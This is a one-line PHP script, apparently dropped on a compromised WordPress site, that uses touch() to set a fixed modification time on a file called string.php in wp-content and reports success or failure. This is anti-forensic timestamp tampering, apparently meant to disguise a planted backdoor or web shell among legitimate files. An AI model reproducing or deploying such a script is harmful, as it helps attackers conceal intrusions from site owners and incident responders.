<?php $path = '/home/mak/_wildcard_.mak.pt/wp-content/string.php'; if (@touch($path, 1767422014)) { die('!success!'); } die('!failed!');